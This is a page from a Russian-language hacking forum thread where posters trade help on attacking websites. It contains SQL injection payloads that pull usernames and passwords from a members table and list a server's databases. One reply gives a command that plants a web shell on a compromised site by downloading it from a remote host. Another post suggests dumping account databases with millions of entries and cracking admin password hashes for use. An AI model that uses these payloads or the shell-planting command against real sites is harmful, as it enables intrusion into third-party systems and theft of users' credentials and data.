HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1728 из 2422 « Первая < 7281228162816781718 1724 1725 1726 1727 1728 1729 1730 1731 1732 1738177818282228 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.07.2011, 19:14
mega_667
Новичок
Регистрация: 03.07.2011
Сообщений: 16
С нами: 7821686

Репутация: 0
По умолчанию
Цитата:
Сообщение от Фараон  
лол что?
1. выполняй "union select database()";
2. потом "union select concat_ws(0x3a,username,password) from REZULTAT_PERVOGO_ZAPROSA.members limit 0,1";
3. Profit!
database() - результат DB.

Результат одинков .... " Table 'DB.members' doesn't exist " ..

и когда просто members и DB.members .....
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 15.07.2011, 19:19
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию
Цитата:
Сообщение от mega_667  
database() - результат DB.
Результат одинков .... " Table 'DB.members' doesn't exist " ..
и когда просто members и DB.members .....
ни, давай ссылягу
 
Ответить с цитированием

  #3  
Старый 15.07.2011, 19:22
mega_667
Новичок
Регистрация: 03.07.2011
Сообщений: 16
С нами: 7821686

Репутация: 0
По умолчанию
Цитата:
Сообщение от Фараон  
ни, давай ссылягу
Всё ребят спасибо .... разобрался с помощью SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA нашёл список баз .... последняя покатила .....
 
Ответить с цитированием

  #4  
Старый 15.07.2011, 19:23
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию
Цитата:
Сообщение от mega_667  
Всё ребят спасибо .... разобрался с помощью SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA нашёл список баз .... последняя покатила .....
можно было проще:

SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA where table_name='members'
 
Ответить с цитированием

  #5  
Старый 15.07.2011, 19:47
freezed
Участник форума
Регистрация: 27.08.2010
Сообщений: 154
С нами: 8268086

Репутация: 7
По умолчанию
Цитата:
Сообщение от Фараон  
можно было проще:
SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA where table_name='members'
с каких пор в таблице schemata содержатся названия таблиц?

Код:
select table_schema form information_schema.tables where table_name='name'
 
Ответить с цитированием

  #6  
Старый 15.07.2011, 23:37
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами: 9061916

Репутация: 0
По умолчанию
Цитата:
Сообщение от mailbrush  
Узнаешь в какой базе находится таблица.
это был тонкий намёк на твою ошибку. смотри внимательнее.
 
Ответить с цитированием

  #7  
Старый 16.07.2011, 13:46
Ups
Участник форума
Регистрация: 11.04.2011
Сообщений: 113
С нами: 7941206

Репутация: 0
По умолчанию
Есть скрипт например:

site.ru/trololo/a.php

Могу выполнять команды через него. Например:

site.ru/trololo/a.php?cmd=ls -la

Выводит лист этой диры.

Так вот. Как залить шелл в диру корневую?

Прав на заливку файла в папку /trololo/ нету.
 
Ответить с цитированием

  #8  
Старый 16.07.2011, 14:21
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами: 8328566

Репутация: 935


По умолчанию
Цитата:
Сообщение от Ups  
Есть скрипт например:
site.ru/trololo/a.php
Могу выполнять команды через него. Например:
site.ru/trololo/a.php?cmd=ls -la
Выводит лист этой диры.
Так вот. Как залить шелл в диру корневую?
Прав на заливку файла в папку /trololo/ нету.
Код:
cd ..;wget -O shell.php http://remote/shell.txt;ls -la
 
Ответить с цитированием

  #9  
Старый 16.07.2011, 18:01
maxfax
Новичок
Регистрация: 23.06.2010
Сообщений: 25
С нами: 8361686

Репутация: 0
По умолчанию
Здравствуйте, меня вот интересует такой вопрос, вот к примеру вы нашли sql инъекцию подобрали количество колонок - одним словом можете выполнять произвольные запросы, а что вы дальше делаете залить shell через sql инъекцию это наверное 0.5% из 100 так как не будет прав на это, ну украдете хеш админа и будете клянчить на форуме "расшифруйте пожалуйста мне хеш" или брутить будете его пол года, это все что можно выжать их sql инъекции ?
 
Ответить с цитированием

  #10  
Старый 16.07.2011, 18:39
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами: 9061916

Репутация: 0
По умолчанию
Цитата:
Сообщение от maxfax  
Здравствуйте, меня вот интересует такой вопрос, вот к примеру вы нашли sql инъекцию подобрали количество колонок - одним словом можете выполнять произвольные запросы, а что вы дальше делаете залить shell через sql инъекцию это наверное 0.5% из 100 так как не будет прав на это, ну украдете хеш админа и будете клянчить на форуме "расшифруйте пожалуйста мне хеш" или брутить будете его пол года, это все что можно выжать их sql инъекции ?
можно сдампить базу на стопицот мульонов акков и юзать её.

а насчёт хеша, так в большинстве случаев он удачно брутиться или его вообще нет, т.к. пассы в plaintext.
 
Ответить с цитированием
Ответ
Страница 1728 из 2422 « Первая < 7281228162816781718 1724 1725 1726 1727 1728 1729 1730 1731 1732 1738177818282228 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.